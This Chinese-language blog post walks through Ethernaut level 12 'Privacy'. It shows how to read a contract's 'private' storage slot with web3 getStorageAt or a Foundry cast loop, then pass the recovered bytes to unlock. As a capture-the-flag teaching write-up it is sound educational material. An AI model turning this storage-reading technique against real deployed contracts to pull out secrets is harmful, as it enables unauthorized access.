# 智能合约黑客攻击 Ethernaut:  
 12. Privacy

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-28
**URL:** https://paragraph.com/@leekdev/ethernaut-12-privacy

## Content

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目将合约 locked 变量改为true。Hack思路关键的data 变量是private 的，但是可以推算出在合约下标为 5 的slot，直接可以读出来。Solidity Storageawait web3.eth.getStorageAt(instance, 5); Output: 0x8e9f9f61dd738241ee4429348250eb6bcd4b985d1546db55888fe7bb937b5ae5 await contract.unlock("0x8e9f9f61dd738241ee4429348250eb6b") 如果合约版本比较高，可以直接用 foundry 的 cast 命令读出来。# 循环读取 slot slot=0 while [ "$slot" -lt 10 ]; do echo "Slot:$slot" cast storage --rpc-url https://eth-sepolia.g.alchemy.com/v2/$API_KEY_ALCHEMY 0xF65BD48b8ecf7AA3d73FA9B58548B4de7a1c28Dc $slot slot=$((slot + 1)) done # 打印合约全部布局 cast storage --rpc-url https://eth-mainnet.g.alchemy.com/v2/$API_KEY_ALCHEMY 0xB519a3E46D43c2ab98A7cAbC6bBF00DF491438e6 执行结果Hack案例防范思路…参考资料Layout of State Variables in Storage 0.8.21Cheatcodes Referencehttps://evm.storage/

## Publication Information

- [Leek DEV](https://paragraph.com/@leekdev/): Publication homepage
- [All Posts](https://paragraph.com/@leekdev/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@leekdev): Subscribe to updates
- [Twitter](https://twitter.com/LeekDEV): Follow on Twitter